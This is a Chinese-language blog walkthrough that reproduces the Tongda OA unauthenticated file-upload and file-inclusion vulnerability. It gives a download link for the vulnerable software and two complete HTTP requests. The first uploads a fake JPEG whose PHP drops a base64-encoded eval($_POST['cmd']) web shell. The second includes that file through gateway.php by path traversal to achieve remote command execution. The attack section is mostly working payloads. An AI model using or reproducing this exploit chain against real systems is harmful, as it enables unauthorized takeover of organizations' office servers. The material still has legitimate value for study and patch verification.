通达OA文件上传&文件包含漏洞解析

pukr

通达OA文件上传&文件包含漏洞解析

通达OA是由北京通达信科科技有限公司开发的一款办公系统，近日通达官方在其官网发布了安全提醒与更新程序，并披露有用户遭到攻击。
攻击者可在未授权的情况下可上传图片木马文件，之后通过精心构造的请求进行文件包含，实现远程命令执行，且攻击者无须登陆认证即可完成攻击。


搭建本地环境
通达OA下载：
链接：https://pan.baidu.com/s/1QFAoLxj9pD1bnnq3f4I8lg
提取码：ousi

包含漏洞的两个文件：
文件上传：webroot\ispirit\im\upload.php
文件包含：webroot\ispirit\interface\gateway.php



漏洞复现
在没有登录的情况下上传文件
我们直接访问
http://localhost//ispirit/im/upload.php
提示：-ERR 用户未登陆
ok,我们在burp中构造数据包

1. POST /ispirit/im/upload.php HTTP/1.1
   
2. Host: 192.168.174.159:80
   
3. Content-Length: 602
   
4. Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBwVAwV3O4sifyhr3
   
5. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
   
6. Accept-Encoding: gzip, deflate
   
7. Accept-Language: zh-CN,zh;q=0.9
   
8. Connection: close
   
9. 
   
10. ------WebKitFormBoundaryBwVAwV3O4sifyhr3
    
11. Content-Disposition: form-data; name="UPLOAD_MODE"
    
12. 
    
13. 2
    
14. ------WebKitFormBoundaryBwVAwV3O4sifyhr3
    
15. Content-Disposition: form-data; name="P"
    
16. 
    
17. 
    
18. ------WebKitFormBoundaryBwVAwV3O4sifyhr3
    
19. Content-Disposition: form-data; name="DEST_UID"
    
20. 
    
21. 1
    
22. ------WebKitFormBoundaryBwVAwV3O4sifyhr3
    
23. Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
    
24. Content-Type: image/jpeg
    
25. 
    
26. <?php
    
27. $fp = fopen('bbskali.php', 'w');
    
28. $a = base64_decode("PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==");
    
29. fwrite($fp, $a);
    
30. fclose($fp);
    
31. ?>
    
32. ------WebKitFormBoundaryBwVAwV3O4sifyhr3--

复制代码

这里我构造了一个名为bbskali.php的图片一句话木马。但是上传之后格式为jpg格式。



如上图，我们成功上传图片。位置为2005/339702047.jpg

通达OA默认上传位置：myoa/attach/im则上面的完整路劲为:myoa/attach/im/2005/339702047.jpg





通过文件包含解析出一句话

1. POST /ispirit/interface/gateway.php HTTP/1.1
   
2. 
   
3. Host: 192.168.123.209
   
4. 
   
5. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
   
6. 
   
7. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
   
8. 
   
9. Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
   
10. 
    
11. Accept-Encoding: gzip, deflate
    
12. 
    
13. Connection: close
    
14. 
    
15. Content-Type: application/x-www-form-urlencoded
    
16. 
    
17. Content-Length: 59
    
18. 
    
19. json={"url":"/general/../../attach/im/2005/339702047.jpg"}

复制代码

解析为php一句话